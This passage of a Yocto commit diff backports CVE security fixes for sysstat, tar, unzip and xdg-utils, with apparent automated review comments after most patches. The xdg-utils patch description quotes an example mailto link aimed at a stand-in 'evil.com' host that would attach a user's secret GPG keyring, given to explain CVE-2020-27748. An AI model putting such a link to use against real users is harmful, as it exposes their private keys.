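 file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
 "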
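--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
+From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
+From: Sebastien <seb@fedora-2.home>
+Date: Sat, 15 Oct 2022 14:24:22 +0200
+Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
+
+allocate_structures function located in sa_common.c insufficiently
+checks bounds before arithmetic multiplication allowing for an
+overflow in the size allocated for the buffer representing system
+activities.
+
+This patch checks that the post-multiplied value is not greater than
+UINT_MAX.
+
+Signed-off-by: Sebastien <seb@fedora-2.home>
+
+Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
+CVE : CVE-2022-39377
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+common.c | 25 +++++++++++++++++++++++++
+common.h | 2 ++
+sa_common.c | 6 ++++++
+3 files changed, 33 insertions(+)
+
+diff --git a/common.c b/common.c
+index ddfe75d..28d475e 100644
+--- a/common.c
++++ b/common.c
+@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
+
+return 0;
+}
++
++/*
++ ***************************************************************************
++ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
++ *
++ * IN:
++ * @val1 First value.
++ * @val2 Second value.
++ * @val3 Third value.
++ ***************************************************************************
++ */
++void check_overflow(size_t val1, size_t val2, size_t val3)
++{
++ if ((unsigned long long) val1 *
++ (unsigned long long) val2 *
++ (unsigned long long) val3 > UINT_MAX) {
++#ifdef DEBUG
++ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
++ __FUNCTION__,
++ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++#endif
++ exit(4);
++ }
++}
++
+#endif /* SOURCE_SADC undefined */
+diff --git a/common.h b/common.h
+index 86905ba..75f837a 100644
+--- a/common.h
++++ b/common.h
+@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
+(char *, unsigned long long *, unsigned int *);
+
+#ifndef SOURCE_SADC
++void check_overflow
++ (size_t, size_t, size_t);
+int count_bits
+(void *, int);
+int count_csvalues
+diff --git a/sa_common.c b/sa_common.c
+index 8a03099..ff90c1f 100644
+--- a/sa_common.c
++++ b/sa_common.c
+@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
+int i, j;
+
+for (i = 0; i < NR_ACT; i++) {
++
+if (act[i]->nr_ini > 0) {
++
++ /* Look for a possible overflow */
++ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
++ (size_t) act[i]->nr2);
++
+for (j = 0; j < 3; j++) {
+SREALLOC(act[i]->buf[j], void,
+(size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
+--
+2.25.1
+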
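Review bot: The tag on line 17 of the patch header is written `CVE : CVE-2022-39377`, with a space before the colon, while the other patches added in this commit use `CVE: ...`. Tooling that matches the tag literally may not credit this patch and would then rely on the file name alone, so `CVE: CVE-2022-39377` would be the consistent form. In the added `check_overflow`, the header comment also omits that the function terminates the process with `exit(4)` and prints nothing unless `DEBUG` is defined. A line such as `* Exits with status 4 if the product exceeds UINT_MAX.` would tell callers that it does not return on failure.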
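--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
+Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-02-18
+
+From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
+From: Pavel Kopylov <pkopylov@cloudlinux.com>
+Date: Wed, 17 May 2023 11:33:45 +0200
+Subject: [PATCH] Fix an overflow which is still possible for some values.
+
+CVE: CVE-2023-33204
+Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+common.c | 7 +++++--
+1 file changed, 5 insertions(+), 2 deletions(-)
+
+Index: sysstat-12.0.3/common.c
+===================================================================
+--- sysstat-12.0.3.orig/common.c
++++ sysstat-12.0.3/common.c
+@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
+*/
+void check_overflow(size_t val1, size_t val2, size_t val3)
+{
+- if ((unsigned long long) val1 *
+- (unsigned long long) val2 *
+- (unsigned long long) val3 > UINT_MAX) {
++ if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
++ (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
++ (unsigned long long) val2) ||
++ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
++ (unsigned long long) val3))) {
+#ifdef DEBUG
+- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
+- __FUNCTION__,
+- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
++ __FUNCTION__, val1, val2, val3);
+#endif
+- exit(4);
++ exit(4);
+}
+}
+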
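Review bot: The rewritten DEBUG message in `check_overflow` passes three `size_t` arguments to `%u` conversions, which is a format/argument mismatch wherever `size_t` is wider than `unsigned int`. The matching form is `"%s: Overflow detected (%zu,%zu,%zu). Aborting...\n"`, and since it only affects DEBUG builds it can be carried as a noted deviation from upstream. Separately, the `Origin:` line points at `opencontainers/runc` while `Upstream-Status` gives the same hash under `sysstat/sysstat`. One of the two is presumably a copy-paste slip and should be corrected so the provenance of the backport can be checked.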
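--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
 
-SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch"
+SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
+file://CVE-2022-39377.patch \
+file://CVE-2023-33204.patch \
+"
 
 SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
 SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"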
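--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
+From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sun, 17 Jan 2021 20:41:11 +0200
+Subject: Fix memory leak in read_header
+
+Bug reported in https://savannah.gnu.org/bugs/?59897
+
+* src/list.c (read_header): Don't return directly from the loop.
+Instead set the status and break. Return the status. Free
+next_long_name and next_long_link before returning.
+
+CVE: CVE-2021-20193
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
+Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
+
+---
+src/list.c | 40 ++++++++++++++++++++++++++++------------
+1 file changed, 28 insertions(+), 12 deletions(-)
+
+diff --git a/src/list.c b/src/list.c
+index e40a5c8..d7ef441 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
+enum read_header_mode mode)
+{
+union block *header;
+- union block *header_copy;
+char *bp;
+union block *data_block;
+size_t size, written;
+- union block *next_long_name = 0;
+- union block *next_long_link = 0;
++ union block *next_long_name = NULL;
++ union block *next_long_link = NULL;
+size_t next_long_name_blocks = 0;
+size_t next_long_link_blocks = 0;
+-
++ enum read_header status = HEADER_SUCCESS;
++
+while (1)
+{
+- enum read_header status;
+-
+header = find_next_block ();
+*return_block = header;
+if (!header)
+- return HEADER_END_OF_FILE;
++ {
++ status = HEADER_END_OF_FILE;
++ break;
++ }
+
+if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
+- return status;
++ break;
+
+/* Good block. Decode file size and return. */
+
+@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+{
+info->stat.st_size = OFF_FROM_HEADER (header->header.size);
+if (info->stat.st_size < 0)
+- return HEADER_FAILURE;
++ {
++ status = HEADER_FAILURE;
++ break;
++ }
+}
+
+if (header->header.typeflag == GNUTYPE_LONGNAME
+@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
+|| header->header.typeflag == SOLARIS_XHDTYPE)
+{
+if (mode == read_header_x_raw)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+else if (header->header.typeflag == GNUTYPE_LONGNAME
+|| header->header.typeflag == GNUTYPE_LONGLINK)
+{
++ union block *header_copy;
+size_t name_size = info->stat.st_size;
+size_t n = name_size % BLOCKSIZE;
+size = name_size + BLOCKSIZE;
+@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+xheader_decode_global (&xhdr);
+xheader_destroy (&xhdr);
+if (mode == read_header_x_global)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+}
+
+/* Loop! */
+@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+name = next_long_name->buffer + BLOCKSIZE;
+recent_long_name = next_long_name;
+recent_long_name_blocks = next_long_name_blocks;
++ next_long_name = NULL;
+}
+else
+{
+@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+name = next_long_link->buffer + BLOCKSIZE;
+recent_long_link = next_long_link;
+recent_long_link_blocks = next_long_link_blocks;
++ next_long_link = NULL;
+}
+else
+{
+@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
+}
+assign_string (&info->link_name, name);
+
+- return HEADER_SUCCESS;
++ break;
+}
+}
++ free (next_long_name);
++ free (next_long_link);
++ return status;
+}
+
+#define ISOCTAL(c) ((c)>='0'&&(c)<='7')
+--
+cgit v1.2.1
+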
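Review bot: The new `free (next_long_name);` and `free (next_long_link);` at the end of read_header are only safe because the hunks at -536 and -567 set those pointers to NULL after handing the buffers to `recent_long_name` and `recent_long_link`. Nothing in the code records that dependency. A one-line comment beside each assignment, e.g. `/* buffer now owned by recent_long_name; must not be freed on exit */`, would keep a later edit from freeing a buffer that is still referenced. read_header's body runs outside these hunks in several places, so the remaining paths through the loop were not checked here.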
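--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
+From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 11 Feb 2023 11:57:39 +0200
+Subject: Fix boundary checking in base-256 decoder
+
+* src/list.c (from_header): Base-256 encoding is at least 2 bytes
+long.
+
+Upstream-Status: Backport [see reference below]
+CVE: CVE-2022-48303
+
+Reference to upstream patch:
+https://savannah.gnu.org/bugs/?62387
+https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+src/list.c | 5 +++--
+1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+
+
+(limited to 'src/list.c')
+
+diff --git a/src/list.c b/src/list.c
+index 9fafc42..86bcfdd 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
+where++;
+}
+}
+- else if (*where == '\200' /* positive base-256 */
+- || *where == '\377' /* negative base-256 */)
++ else if (where <= lim - 2
++ && (*where == '\200' /* positive base-256 */
++ || *where == '\377' /* negative base-256 */))
+{
+/* Parse base-256 output. A nonnegative number N is
+represented as (256**DIGS)/2 + N; a negative number -N is
+--
+cgit v1.1
+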
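Review bot: The new guard `where <= lim - 2` forms a pointer two bytes before `lim`. If `lim` is derived from `where0 + digs` (its definition is outside the hunk) and a field is shorter than two bytes, that pointer lies before the buffer, which C leaves undefined even for a comparison. Writing the bound as a length, `else if (lim - where >= 2`, states the same "at least 2 bytes" rule without forming it. Separately, the patch header carries page residue that could be dropped: a second `Signed-off-by:` fused onto the diffstat line, and the line `(limited to 'src/list.c')`.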
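--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
+From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 28 Aug 2021 16:02:12 +0300
+Subject: Fix handling of extended header prefixes
+
+* src/xheader.c (locate_handler): Recognize prefix keywords only
+when followed by a dot.
+(xattr_decoder): Use xmalloc/xstrdup instead of alloc
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
+CVE: CVE-2023-39804
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+src/xheader.c | 17 +++++++++--------
+1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/src/xheader.c b/src/xheader.c
+index 4f8b2b2..3cd694d 100644
+--- a/src/xheader.c
++++ b/src/xheader.c
+@@ -637,11 +637,11 @@ static struct xhdr_tab const *
+locate_handler (char const *keyword)
+{
+struct xhdr_tab const *p;
+-
+for (p = xhdr_tab; p->keyword; p++)
+if (p->prefix)
+{
+- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
++ size_t kwlen = strlen (p->keyword);
++ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
+return p;
+}
+else
+@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
+char const *keyword, char const *arg, size_t size)
+{
+char *xstr, *xkey;
+-
++
+/* copy keyword */
+- size_t klen_raw = strlen (keyword);
+- xkey = alloca (klen_raw + 1);
+- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
++ xkey = xstrdup (keyword);
+
+/* copy value */
+- xstr = alloca (size + 1);
++ xstr = xmalloc (size + 1);
+memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
+
+xattr_decode_keyword (xkey);
+
+- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
++ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
++
++ free (xkey);
++ free (xstr);
+}
+
+static void
+--
+cgit v1.1
+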
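Review bot: In locate_handler the new condition reads `keyword[kwlen]` before `strncmp` has shown that `keyword` is at least `kwlen` characters long, so a keyword shorter than a prefix entry is indexed past its terminator. Swapping the operands keeps the fix and removes that read: `if (strncmp (p->keyword, keyword, kwlen) == 0 && keyword[kwlen] == '.')`. After a successful `strncmp`, `keyword[kwlen]` is at worst the terminating NUL. Extended-header keywords presumably come from the archive being read, so this path should be treated as handling untrusted input. locate_handler continues past the end of the hunk.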
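--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 
+PR = "r1"
+
 SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
 file://musl_dirent.patch \
+file://CVE-2021-20193.patch \
+file://CVE-2022-48303.patch \
+file://CVE-2023-39804.patch \
 "
 
 SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
 NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
 
 BBCLASSEXTEND = "native nativesdk"
+
+# Avoid false positives from CVEs in node-tar package
+# For example CVE-2021-{32803,32804,37701,37712,37713}
+CVE_PRODUCT = "gnu:tar"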
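--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Fake version of the texinfo utility suite"
 SECTION = "console/utils"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
 DEPENDS = ""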
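--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
 the history of local time for many representative locations around the globe."
 HOMEPAGE = "http://www.iana.org/time-zones"
 SECTION = "base"
-LICENSE = "PD & BSD & BSD-3-Clause"
+LICENSE = "PD & BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
 
-PV = "2021a"
+PV = "2024a"
 
 SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
 http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
 
 UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
 
-SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0"
-SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08"
+SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
+SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"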
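--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \
 "
 # pacificnew
 
+# "slim" is the default since 2020b
+# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
+ZIC_FMT ?= "slim"
+
 do_compile () {
 for zone in ${TZONES}; do \
-${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
+${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
 ${S}/${zone} ; \
-${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
+${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
 ${S}/${zone} ; \
-${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
+${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
 ${S}/${zone} ; \
 done
 }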
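--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
+From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
+From: Nils Bars <nils.bars@t-online.de>
+Date: Mon, 17 Jan 2022 16:53:16 +0000
+Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
+
+This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
+to read as many bytes as indicated by the extra field length attribute.
+Furthermore, this fixes a null pointer dereference if an archive contains an
+`EF_UNIPATH` extra field but does not have a filename set.
+---
+fileio.c | 5 ++++-
+process.c | 6 +++++-
+2 files changed, 9 insertions(+), 2 deletions(-)
+---
+
+Patch from:
+https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
+https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
+Regenerated to apply without offsets.
+
+CVE: CVE-2021-4217
+
+Upstream-Status: Pending [infozip upstream inactive]
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+
+
+diff --git a/fileio.c b/fileio.c
+index 14460f3..1dc319e 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */
+seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
+(G.inptr-G.inbuf) + length);
+} else {
+- if (readbuf(__G__ (char *)G.extra_field, length) == 0)
++ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
++ if (bytes_read == 0)
+return PK_EOF;
++ if (bytes_read != length)
++ return PK_ERR;
+/* Looks like here is where extra fields are read */
+if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
+{
+diff --git a/process.c b/process.c
+index 5f8f6c6..de843a5 100644
+--- a/process.c
++++ b/process.c
+@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
+G.unipath_checksum = makelong(offset + ef_buf);
+offset += 4;
+
++ if (!G.filename_full) {
++ /* Check if we have a unicode extra section but no filename set */
++ return PK_ERR;
++ }
++
+/*
+* Compute 32-bit crc
+*/
+-
+chksum = crc32(chksum, (uch *)(G.filename_full),
+strlen(G.filename_full));
+
+--
+2.32.0
+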
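Review bot: In the fileio.c hunk the new short-read branch returns PK_ERR while `G.extra_field` still points at the buffer that `readbuf` filled only in part, so the uninitialized tail stays reachable through the global if any caller keeps going after the error. Clearing it on that path would close this off: `free(G.extra_field); G.extra_field = NULL; return PK_ERR;`. The allocation of `G.extra_field` and the callers of `do_string` are outside the hunk, so this needs checking against the full function before it is applied.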
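--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0529
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/process.c b/process.c
+index d2a846e..99b9c7b 100644
+--- a/process.c
++++ b/process.c
+@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
+char buf[9];
+char *buffer = NULL;
+char *local_string = NULL;
++ size_t buffer_size;
+
+for (wsize = 0; wide_string[wsize]; wsize++) ;
+
+if (max_bytes < MAX_ESCAPE_BYTES)
+max_bytes = MAX_ESCAPE_BYTES;
+
+- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
++ buffer_size = wsize * max_bytes + 1;
++ if ((buffer = (char *)malloc(buffer_size)) == NULL) {
+return NULL;
+}
+
+@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
+/* no MB for this wide */
+/* use escape for wide character */
+char *escape_string = wide_to_escape_string(wide_string[i]);
+- strcat(buffer, escape_string);
++ size_t buffer_len = strlen(buffer);
++ size_t escape_string_len = strlen(escape_string);
++ if (buffer_len + escape_string_len + 1 > buffer_size)
++ escape_string_len = buffer_size - buffer_len - 1;
++ strncat(buffer, escape_string, escape_string_len);
+free(escape_string);
+}
+}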
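Review bot: The bounded `strncat` in the second process.c hunk silently truncates the converted name when the escape sequence does not fit, so the caller gets a filename that differs from the one stored in the archive and no error is signalled. A comment such as `/* truncate rather than overflow; name may be cut mid-escape */` would make that intent explicit; failing instead would need a cleanup path that is outside the hunk. `buffer_size = wsize * max_bytes + 1` is computed with no overflow check, and the types of `wsize` and `max_bytes` are declared outside the hunk, so whether the product can wrap should be confirmed there. The patch header has only a bug link; a one-line description of the fix and a Signed-off-by would match CVE-2021-4217.patch in this commit.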
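--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0530
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/fileio.c b/fileio.c
+index 6290824..77e4b5f 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */
+/* convert UTF-8 to local character set */
+fn = utf8_to_local_string(G.unipath_filename,
+G.unicode_escape_all);
++ if (fn == NULL)
++ return PK_ERR;
++
+/* make sure filename is short enough */
+if (strlen(fn) >= FILNAMSIZ) {
+fn[FILNAMSIZ - 1] = '\0';
+diff --git a/process.c b/process.c
+index d2a846e..715bc0f 100644
+--- a/process.c
++++ b/process.c
+@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
+int escape_all;
+{
+zwchar *wide = utf8_to_wide_string(utf8_string);
++ if (wide == NULL)
++ return NULL;
+char *loc = wide_to_local_string(wide, escape_all);
+free(wide);
+return loc;
+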
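Review bot: In the process.c hunk the added `if (wide == NULL) return NULL;` sits before the declaration of `loc`, which is a declaration after a statement and is rejected by compilers in strict C89 mode. The function uses K&R-style parameter declarations, so the file appears to target old dialects. Declaring first keeps it portable: `char *loc;`, then `if (wide == NULL) return NULL;`, then `loc = wide_to_local_string(wide, escape_all);`. As with CVE-2022-0529.patch, the header would benefit from a short description and a Signed-off-by.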
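--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utilities for extracting and viewing files in .zip archives"
 HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
 SECTION = "console/utils"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
 file://CVE-2019-13232_p1.patch \
 file://CVE-2019-13232_p2.patch \
 file://CVE-2019-13232_p3.patch \
+file://CVE-2021-4217.patch \
+file://CVE-2022-0529.patch \
+file://CVE-2022-0530.patch \
 "
 UPSTREAM_VERSION_UNKNOWN = "1"
 
 SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
 SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
 
+# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
+CVE_CHECK_WHITELIST += "CVE-2008-0888"
+
 # exclude version 5.5.2 which triggers a false positive
 UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
 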
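--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -21,7 +21,6 @@ SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c
 # Can be dropped when the output next changes, avoids failures after
 # reproducibility issues
 PR = "r1"
-HASHEQUIV_HASH_VERSION .= ".1"
 
 UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
 UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"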
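--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+scripts/xdg-email.in | 7 +------
+1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+run_thunderbird()
+{
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+THUNDERBIRD="$1"
+MAILTO=$(echo "$2" | sed 's/^mailto://')
+echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
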